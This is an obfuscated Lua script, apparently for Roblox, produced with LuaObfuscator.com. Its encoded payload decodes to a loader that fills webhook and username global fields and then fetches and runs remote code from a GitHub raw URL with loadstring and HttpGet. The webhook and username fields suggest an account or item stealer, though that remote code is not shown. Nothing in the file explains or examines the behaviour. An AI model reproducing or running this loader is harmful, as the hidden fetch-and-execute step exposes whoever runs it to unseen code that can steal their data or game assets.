--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=1 + 0 ;local v37=(v21(v35,958 -(892 + 65) ,51 -31 ) * ((621 -((729 -174) + 64))^(1219 -(1069 + 118)))) + v34 ;local v38=v21(v35,952 -(857 + 74) ,599 -((832 -465) + 201) );local v39=((v21(v35,959 -(214 + 713) )==(1 + 0)) and  -(1 + 0)) or (1 + 0) ;if (v38==(877 -((616 -334) + 595))) then if (v37==((285 + 1352) -(1523 + 114))) then return v39 * (0 + 0) ;else v38=953 -(802 + 150) ;v36=(0 -0) -0 ;end elseif (v38==(3112 -(68 + 997))) then return ((v37==(1270 -(225 + 1 + 1044))) and (v39 * ((4 -3)/(997 -(915 + 82))))) or (v39 * NaN) ;end return v8(v39,v38-(1140 -(32 + 85)) ) * (v36 + (v37/((2 + (791 -(368 + 423)))^52))) ;end v26=nil;function v26(v40)local v41=0 -0 ;local v42;local v43;while true do if (v41==(20 -(4 + 6 + 7 + 1))) then v43={};for v87=3 -2 , #v42 do v43[v87]=v2(v1(v3(v42,v87,v87)));end v41=445 -(416 + 26) ;end if (v41==(3 -(774 -(201 + 571)))) then v42=v3(v16,v19,(v19 + v40) -(1 + 0) );v19=v19 + v40 ;v41=3 -1 ;end if (v41==(441 -(145 + 293))) then return v6(v43);end if (v41==0) then v42=nil;if  not v40 then v40=v24();if (v40==(430 -(44 + 386))) then return "";end end v41=1487 -(998 + 488) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44~=(676 -(534 + 141))) then else v47=nil;v48=nil;v44=1 + 1 ;end if (v44~=(3 + 0)) then else v51=nil;while true do if (v45==0) then local v94=0 + 0 ;while true do if (v94~=(1 -0)) then else v48={};v49={v46,v47,nil,v48};v94=2 + 0 ;end if (v94~=0) then else v46={};v47={};v94=1;end if (v94~=(2 + 0)) then else v45=397 -(115 + 281) ;break;end end end if (v45~=(4 -2)) then else for v96=1,v24() do local v97=0;local v98;local v99;while true do if (v97==(0 + 0)) then local v107=0 -0 ;local v108;while true do if (v107~=(0 -0)) then else v108=867 -(550 + 317) ;while true do if (v108==(0 -0)) then local v173=0;while true do if (v173==(0 -0)) then v98=0;v99=nil;v173=1;end if (1~=v173) then else v108=1;break;end end end if (1==v108) then v97=1;break;end end break;end end end if (v97~=1) then else while true do if (v98~=0) then else v99=v22();if (v21(v99,2 -1 ,1)~=(285 -(134 + 151))) then else local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (1~=v167) then else v170=nil;v171=nil;v167=2;end if (v167~=(1667 -(970 + 695))) then else v172=nil;while true do if (v168~=(1 -0)) then else local v175=1990 -(582 + 1408) ;while true do if ((3 -2)==v175) then v168=2;break;end if ((0 -0)~=v175) then else v171=nil;v172=nil;v175=3 -2 ;end end end if (v168~=(1826 -(1195 + 629))) then else while true do if ((1 -0)==v169) then local v176=241 -(187 + 54) ;local v177;while true do if (v176==(780 -(162 + 618))) then v177=0;while true do if (v177==(0 + 0)) then local v185=0 + 0 ;while true do if (v185~=1) then else v177=1 -0 ;break;end if ((0 -0)~=v185) then else v172={v23(),v23(),nil,nil};if (v170==0) then local v188=0 + 0 ;while true do if ((0 -0)~=v188) then else v172[4 -1 ]=v23();v172[4]=v23();break;end end elseif (v170==(1385 -(746 + 638))) then v172[3]=v24();elseif (v170==2) then v172[2 + 1 ]=v24() -(2^16) ;elseif (v170==(4 -1)) then local v197=341 -(218 + 123) ;local v198;local v199;while true do if (v197==1) then while true do if (0==v198) then v199=0;while true do if (v199==(1581 -(1535 + 46))) then v172[3]=v24() -((2 + 0)^(3 + 13)) ;v172[564 -(306 + 254) ]=v23();break;end end break;end end break;end if (v197==0) then v198=0 + 0 ;v199=nil;v197=1 -0 ;end end end v185=1;end end end if (v177~=1) then else v169=1469 -(899 + 568) ;break;end end break;end end end if (v169~=(2 + 0)) then else local v178=0;local v179;while true do if (v178~=0) then else v179=0 -0 ;while true do if ((604 -(268 + 335))~=v179) then else v169=3;break;end if (v179==(290 -(60 + 230))) then local v186=572 -(426 + 146) ;while true do if (v186~=(0 + 0)) then else local v187=0;while true do if (1~=v187) then else v186=1;break;end if (0==v187) then if (v21(v171,1,1)~=(1457 -(282 + 1174))) then else v172[813 -(569 + 242) ]=v51[v172[2]];end if (v21(v171,5 -3 ,1 + 1 )~=1) then else v172[1027 -(706 + 318) ]=v51[v172[3]];end v187=1;end end end if ((1252 -(721 + 530))==v186) then v179=1;break;end end end end break;end end end if (v169~=0) then else local v180=0;while true do if (v180~=(1272 -(945 + 326))) then else v169=2 -1 ;break;end if (v180~=(0 + 0)) then else local v184=0;while true do if (v184~=0) then else v170=v21(v99,702 -(271 + 429) ,3);v171=v21(v99,4 + 0 ,1506 -(1408 + 92) );v184=1087 -(461 + 625) ;end if (v184==1) then v180=1289 -(993 + 295) ;break;end end end end end if (v169~=(1 + 2)) then else if (v21(v171,3,3)==1) then v172[1175 -(418 + 753) ]=v51[v172[2 + 2 ]];end v46[v96]=v172;break;end end break;end if (v168~=(0 + 0)) then else v169=0 + 0 ;v170=nil;v168=1 + 0 ;end end break;end if (v167==0) then v168=0;v169=nil;v167=1;end end end break;end end break;end end end for v100=530 -(406 + 123) ,v24() do v47[v100-1 ]=v29();end return v49;end if (v45~=(1770 -(1749 + 20))) then else v50=v24();v51={};for v102=1 + 0 ,v50 do local v103=0;local v104;local v105;local v106;while true do if (v103==(1322 -(1249 + 73))) then local v109=0 + 0 ;while true do if (v109==0) then v104=0;v105=nil;v109=1;end if (v109==1) then v103=1146 -(466 + 679) ;break;end end end if (v103~=(2 -1)) then else v106=nil;while true do if (v104==0) then local v150=0 -0 ;local v151;while true do if (v150==0) then v151=1900 -(106 + 1794) ;while true do if (v151~=(0 + 0)) then else local v174=0 + 0 ;while true do if (v174==1) then v151=2 -1 ;break;end if (v174~=0) then else v105=v22();v106=nil;v174=2 -1 ;end end end if (v151==1) then v104=1;break;end end break;end end end if (v104==(115 -(4 + 110))) then if (v105==1) then v106=v22()~=0 ;elseif (v105==2) then v106=v25();elseif (v105~=3) then else v106=v26();end v51[v102]=v106;break;end end break;end end end v49[587 -(57 + 527) ]=v22();v45=2;end end break;end if (v44~=0) then else v45=1427 -(41 + 1386) ;v46=nil;v44=1;end if ((105 -(17 + 86))~=v44) then else v49=nil;v50=nil;v44=3 + 0 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v80=0;while true do if (v80==0) then v20=v0(v3(v52,1,1));return "";end end else local v81=v2(v0(v52,16));if v20 then local v89=v5(v81,v20);v20=nil;return v89;else return v81;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (6 -3) );v19=v19 + 4 ;return (v56 * (48585891 -31808675)) + (v55 * 65536) + (v54 * (422 -(122 + 44))) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v66=v60;local v67=v61;local v68=v62;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v82=0,v74 do if (v82>=v68) then v72[v82-v68 ]=v73[v82 + 1 ];else v76[v82]=v73[v82 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=11) then if (v79<=5) then if (v79<=2) then if (v79<=0) then v76[v78[2]]();elseif (v79==1) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else do return;end end elseif (v79<=3) then local v110=0;local v111;while true do if (v110==0) then v111=v78[2];v76[v111]=v76[v111](v13(v76,v111 + 1 ,v71));break;end end elseif (v79>4) then v76[v78[2]]=v78[3]~=0 ;else for v155=v78[2],v78[3] do v76[v155]=nil;end end elseif (v79<=8) then if (v79<=6) then do return;end elseif (v79>7) then v76[v78[2]][v78[3]]=v78[4];else v76[v78[2]]=v59[v78[3]];end elseif (v79<=9) then local v112=v78[2];local v113=v76[v78[3]];v76[v112 + 1 ]=v113;v76[v112]=v113[v78[4]];elseif (v79==10) then local v133=v78[2];v76[v133]=v76[v133](v13(v76,v133 + 1 ,v71));else v70=v78[3];end elseif (v79<=17) then if (v79<=14) then if (v79<=12) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79>13) then v76[v78[2]][v78[3]]=v78[4];else v76[v78[2]]=v78[3];end elseif (v79<=15) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==1) then v71=(v120 + v118) -1 ;v121=0;v117=2;end if (v117==2) then for v164=v118,v71 do v121=v121 + 1 ;v76[v164]=v119[v121];end break;end if (v117==0) then v118=v78[2];v119,v120=v69(v76[v118](v13(v76,v118 + 1 ,v78[3])));v117=1;end end elseif (v79==16) then v76[v78[2]]();else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=20) then if (v79<=18) then local v122=v78[2];local v123=v76[v78[3]];v76[v122 + 1 ]=v123;v76[v122]=v123[v78[4]];elseif (v79>19) then for v158=v78[2],v78[3] do v76[v158]=nil;end else v76[v78[2]]=v78[3];end elseif (v79<=21) then v70=v78[3];elseif (v79==22) then local v144=v78[2];local v145,v146=v69(v76[v144](v13(v76,v144 + 1 ,v78[3])));v71=(v146 + v144) -1 ;local v147=0;for v160=v144,v71 do v147=v147 + 1 ;v76[v160]=v145[v147];end else v76[v78[2]]=v59[v78[3]];end v70=v70 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v85=(v63/(((1214 -(323 + 889)) -0)^(v64-1)))%((6 -4)^(((v65-(1 + 0)) -(v64-(1 + 0))) + 1)) ;return v85-(v85%(1 -0)) ;else local v86=(67 -(30 + 35))^(v64-(1 + 0)) ;return (((v63%(v86 + v86))>=v86) and ((3385 -2127) -(1043 + 214))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200253O0012133O00014O0014000100013O0026013O00020001000100040B3O00020001001213000100013O002601000100120001000200040B3O00120001001207000200033O003008000200040005001207000200063O001207000300073O002009000300030008001213000500094O0011000600014O000F000300064O000A00023O00022O001000020001000100040B3O00240001002601000100050001000100040B3O00050001001213000200013O0026010002001C0001000100040B3O001C0001001207000300033O0030080003000A0005001207000300033O0030080003000B0005001213000200023O002601000200150001000200040B3O00150001001213000100023O00040B3O0005000100040B3O0015000100040B3O0005000100040B3O0024000100040B3O000200012O00023O00017O00",v9(),...);end
